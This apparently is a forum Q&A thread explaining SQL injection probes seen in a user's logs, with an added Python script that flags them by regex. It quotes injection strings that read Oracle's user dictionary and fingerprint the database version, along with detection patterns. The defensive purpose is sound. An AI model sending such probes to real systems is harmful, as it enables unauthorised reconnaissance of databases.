loda7023link 2018-01-19 03:27

MySQL database experts, please take a look: what is the purpose of this kind of SQL injection attack, and what is it trying to get from me?


  • threenewbee 2018-01-19 05:31

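    There are many probes here. For example, some probe your database's table structure, such as select * from sys.dba_users--, and some probe your server's software environment, such as select @@version,1,1,1--
    Some probe whether your program builds its SQL by string concatenation in JS (for example Node.js): + ltrim('') + '
    Others may target vulnerabilities in a specific web system, and so on.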
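
An added example, not part of the original answer: a log-triage script that tags request parameter values with the probe families the answer names, so that one client cycling through several families can be recognised as an automated scanner. The rule labels, function names, threshold, and sample records (documentation IP addresses) are constructed for illustration.

```python
import re
from collections import Counter

# (label, pattern) pairs. The patterns cover only the probe shapes quoted in
# the answer above; the labels are this example's own names.
RULES = [
    ("oracle-dictionary-read", re.compile(r"\bsys\.dba_\w+", re.I)),
    ("version-fingerprint", re.compile(r"@@version\b", re.I)),
    ("string-concat-probe", re.compile(r"\+\s*ltrim\(\s*''\s*\)\s*\+", re.I)),
    ("stacked-statement", re.compile(r";\s*select\b", re.I)),
    ("trailing-sql-comment", re.compile(r"--\s*$")),
]

def classify(value):
    """Return the sorted labels of every rule that matches one parameter value."""
    return sorted(label for label, rx in RULES if rx.search(value))

def triage(records):
    """Count matched probe families per client from (client, value) records."""
    per_client = {}
    for client, value in records:
        per_client.setdefault(client, Counter()).update(classify(value))
    return per_client

def looks_like_scanner(families, min_families=3):
    """Several distinct families from one client suggests a scanner's payload
    list, not an attempt to read one specific piece of data.
    min_families is an assumed threshold; tune it on your own logs."""
    return len(families) >= min_families

# Constructed sample: parameter values as they might appear in an access log.
SAMPLE = [
    ("203.0.113.7", "; select * from sys.dba_users--"),
    ("203.0.113.7", "; select @@version,1,1,1--"),
    ("203.0.113.7", " + ltrim('') + '"),
    ("198.51.100.20", "O'Brien"),        # benign value containing a quote
    ("198.51.100.20", "blue + green"),   # benign value containing a plus
]

if __name__ == "__main__":
    for client, families in triage(SAMPLE).items():
        verdict = "scanner-like" if looks_like_scanner(families) else "no probe pattern"
        print(client, dict(families), verdict)
```

The first two sample values target different database products (an Oracle dictionary view and the `@@version` variable), so when both arrive from one client the requests are fingerprinting the backend rather than assuming MySQL.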
